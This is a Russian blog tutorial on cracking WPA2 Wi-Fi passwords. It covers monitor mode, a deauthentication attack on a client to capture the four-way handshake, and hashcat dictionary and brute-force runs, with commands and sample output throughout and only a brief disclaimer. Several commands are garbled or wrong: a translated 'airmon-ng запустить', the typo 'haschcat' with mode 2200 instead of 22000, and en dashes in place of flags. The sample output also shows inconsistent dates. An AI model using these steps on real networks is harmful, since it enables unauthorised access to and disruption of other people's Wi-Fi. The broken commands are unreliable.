Найти тему
GIDWIFI

Как взломать пароли Wi-Fi с помощью Hashcat (не мануал)

Оглавление
https://stock.adobe.com Автор: thebigland45
https://stock.adobe.com Автор: thebigland45

В этом руководстве вы узнаете, как взломать пароли Wi-Fi с помощью Hashcat. Hashcat — это мощный инструмент для восстановления паролей, который поможет вам восстановить утерянные или забытые пароли для различных платформ, включая Windows, Linux и macOS.

⚠️Изложенный материал в этой статье всего лишь обьяснение, а не урок. Мы ни в коем случае не принуждаем вас заниматься подобной деятельностью (взломом), так как за такое можно понести административное наказания.

Hashcat также является одним из немногих инструментов, которые могут работать с графическим процессором и предлагают множество способов поиска паролей по хешам.

Самый простой способ взломать хэш — попытаться сначала угадать пароль. Атаки по словарю и перебор пароля являются наиболее распространенными способами подбора паролей.

Эти методы используют файл, содержащий слова, фразы, общие пароли и другие строки, которые могут использоваться в качестве пароля.

Включение режима монитора

Сначала нужно перевести беспроводную карту в режим монитора, используя следующую команду.

airmon-ng запустить wlan0

Я предполагаю, что имя вашего беспроводного интерфейса — wlan0, но обязательно используйте правильное имя, если оно отличается. Вы можете использовать команду «iwconfig», чтобы найти имя беспроводного интерфейса.

Поиск цели

Начните сканирование ближайших беспроводных маршрутизаторов с помощью следующей команды.

airodump-ng wlan0

CH 6][ BAT: 3 часа 9 минут ][ Прошло: 8 с ][ 2022-05-20 11:10

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64 :92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet 28
:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:01:35:39:87 -42 17 0 0 11 54e WPA2 CCMP PSK Orange-Net

BSSID STATION PWR Скорость проверки потерянных пакетов

28:EF:01:35:34: 85 28:EF:01:23:46:68 -57 0 - 1 0 1

Отобразится таблица данных для всех маршрутизаторов Wi-Fi в радиусе действия.

Для целей этой демонстрации я выберу взлом пароля моей сети «SkyNet».

Далее мне нужен MAC-адрес точки доступа (BSSID) и канал из сети. Давайте откроем другой терминал и наберем:

airodump-ng --bssid 28:EF:01:35:34:85 -c 6 --write wpa-01 wlan0

— write wpa-01 — это имя файла, в который вы записываете данные и где будет храниться четырехстороннее рукопожатие.

-2

Вы можете использовать команду «ls», чтобы увидеть файл, который позже вам нужно будет преобразовать в другой формат, чтобы взломать пароль.

Захват рукопожатия WPA/WPA2

WPA/WPA2 использует четырехстороннее рукопожатие для аутентификации устройств в сети. Чтобы перехватить рукопожатие четырехсторонней аутентификации, вам необходимо, чтобы клиент прошел аутентификацию на точке доступа.

Если они уже прошли аутентификацию, вы можете деаутентифицировать их (отключить), и их система автоматически проведет повторную аутентификацию, в результате чего вы сможете получить четырехстороннее рукопожатие в процессе. Откройте другой терминал и введите:

aireplay-ng -0 100 -a 28:EF:01:35:34:85 -c 28:EF:01:23:46:68 wlan0

-0 означает деаутентификацию.100 — количество пакетов деаутентификации.-a 28:EF:01:35:34:85 — MAC-адрес точки доступа.-c 28:EF:01:23:46:68 — это MAC-адрес клиента, который вы деаутентифицируете.

CH 6][ Прошло: 4 с ][ 2014-03-24 17:51 ][ WPA-квитирование: 28:EF:01:35:34:85

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

28:EF:01:35:34:85 39 100 51 0 0 6 54 WPA2 CCMP PSK SkyNet

BSSID STATION PWR Проверка потерянных пакетов

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1

На экране выше обратите внимание на надпись «WPA-рукопожатие: 28:EF:01:35:34:85» в правом верхнем углу. Это означает, что airodump-ng успешно зафиксировал рукопожатие.

Преобразуйте файл .cap в формат .hccap.

Прежде чем взломать пароль, вам необходимо преобразовать файл .cap (wpa-01.cap) в формат файла hashcat .hc22000. Это можно сделать очень быстро, загрузив файл .cap на https://hashcat.net/cap2hashcat и преобразовав его в формат .hc22000.

-3

Взлом рукопожатия WPA/WPA2

Hashcat очень гибок, поэтому я расскажу о двух наиболее распространенных атаках:

  • Атака по словарю
  • Атака грубой силой

Атака по словарю

Помимо hashcat вам также понадобится список слов. Список слов — это список часто используемых паролей в большом текстовом файле.

Популярный список паролей — rockyou.txt. Он содержит список часто используемых паролей и популярен среди пентестеров. Вы можете найти список слов rockyou в каталоге /usr/share/wordlists в Kali Linux.

Теперь используйте следующую команду, чтобы начать процесс взлома:

hashcat –m 22000 wpa-01.hc22000 rockyou.txt

Этой командой я запускаю hashcat в режиме 22000, предназначенном для атаки на сетевые протоколы WPA. Далее укажите имя файла, который вы хотите взломать, в моем случае это «wpa-01.hc22000», и, наконец, «rockyou.txt» — это файл списка слов.

-4

Пароль был успешно взломан: «justletmein».

Атака грубой силы

Атака методом перебора основана на переборе всех возможных комбинаций, что приводит к огромному количеству возможных комбинаций по мере увеличения длины пароля. Чтобы начать атаку, используйте следующую команду:

haschcat –m 2200 –a 3 wpa-01.hc22000 ?l ?l ?l ?l ?l ?l ?l ?l ?l ?l

-a 3 означает, что вы используете режим грубой атаки.wpa-01.hc22000 = — это преобразованный файл .cap.?l ?l ?l ?l ?l ?l ?l ?l ?l ?l = Это ваша маска, где l = строчные буквы. Это означает, что пароль состоит из строчных букв.

Hashcat позволяет использовать следующие встроенные кодировки для атаки на файл подтверждения WPA/WPA2.

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>? @[\ ]^_`{|}~

Допустим, ваш пароль — 87654321. Вы можете использовать собственную маску, например ?d?d?d?d?d?d?d?d

Это означает, что вы пытаетесь взломать 8-значный пароль, например 87654323 или 43446789…

-5

Здесь вы можете увидеть пароль «justletmein». Итак, я использую маску строчных букв (?l = abcdefghijklmnopqrstuvwxyz), чтобы взломать пароль.

Заключение

В этом руководстве вы узнали, как взламывают пароли WPA2 с помощью таких инструментов, как Hashcat. Этот вид деятельности следует выполнять только в контролируемой среде и при наличии разрешения.

Надеюсь, вам понравился этот подробный урок. Если у вас есть какие-либо вопросы, не стесняйтесь оставлять комментарии.